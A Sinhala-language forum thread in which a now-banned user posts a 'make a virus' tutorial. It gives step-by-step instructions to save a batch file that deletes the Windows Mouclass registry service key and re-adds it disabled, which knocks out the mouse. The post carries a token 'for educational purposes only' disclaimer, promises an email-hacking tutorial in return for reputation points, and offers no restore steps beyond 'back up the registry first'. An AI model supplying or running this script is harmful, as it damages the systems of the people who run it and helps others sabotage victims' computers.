වයිරස්_හදමු

NeoStar

Banned
Jan 10, 2015
157
47
0
වයිරස් හදමු

Mouse එකට කෙලවෙන්න Virus එකක් හදමුද?- Make a virus that disable Mouse


disable-mouse-virus.jpg



(මේ සියලුම දෙවල් අධ්‍යාපනය සදහා පමනි...)

හරි එහෙනම් වැඩේ පටා...න් ගමු නේද.එහෙනම් වෙනදා වගේ Notepad එක Open කරගෙන වැඩේට ලෑස්ති වෙන්න්කෝ.

01.මුලින්ම Notepad එක Open කරගන්න දන්නැත්තම් මෙහෙම යන්න. Start-Allprogarm-Accessories-Notepad

02.දැන් මං පහලින් දාලා තියෙන Code ටික Notepad එකට Copy/past කරන්න.

03.දැන් Save as ගිහින් Mouse.bat කියල ගහලා Save කරගන්න.

04.අන්තිමට .bat කියලා ගහන්න ඕනි.Mouse කියන තැනට ඕයාලා කැමති නමක් දාගෙන Save කරගන්න.

මෙන්න කෝඩ් ටික

rem ---------------------------------
rem Disable Mouse
set
key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

(මේ සියලුම දෙවල් අධ්‍යාපනය සදහා පමනි...)
 

NeoStar

Banned
Jan 10, 2015
157
47
0
ඊ මේල් එකක් හැක් කරන හැටි කියලා දෙනවා ඊලග කොටසින්. හැබැයි මට රෙප් වැඩිපුර ලැබුනොත් විතරයි එක දාන්නේ.
 

mcwolfe

Well-known member
  • Jul 24, 2011
    6,919
    838
    113
    මට පොඩ්ඩක් මේක hack කරන්න උදව් කරහන්කෝ

    old-box-vintage-rusty-34532992.jpg
     

    Error365!

    Well-known member
  • Jun 27, 2012
    13,000
    9,574
    113
    එක තැනක නෑ
    හැක් කිරීමට ඉගනීමට අවශ්‍ය නම් රේප් වැඩිපුර අවශ්‍යයි.

    kiyala denawa nam deyak hariyata kiyala diyan ban. dan meke inna ewun me script eka run karama, registry eke key ekak delete wenawa. umba ayeth e default key eka ganna ekath dapan. naththam mun anathaine.

    BTW good luck! ;)
     

    NeoStar

    Banned
    Jan 10, 2015
    157
    47
    0
    kiyala denawa nam deyak hariyata kiyala diyan ban. dan meke inna ewun me script eka run karama, registry eke key ekak delete wenawa. umba ayeth e default key eka ganna ekath dapan. naththam mun anathaine.

    BTW good luck! ;)

    ඒකට රෙජිස්ටරි එකේ බැකප් එකක් කලින් ගනින්.
     
    • Like
    Reactions: Mirrors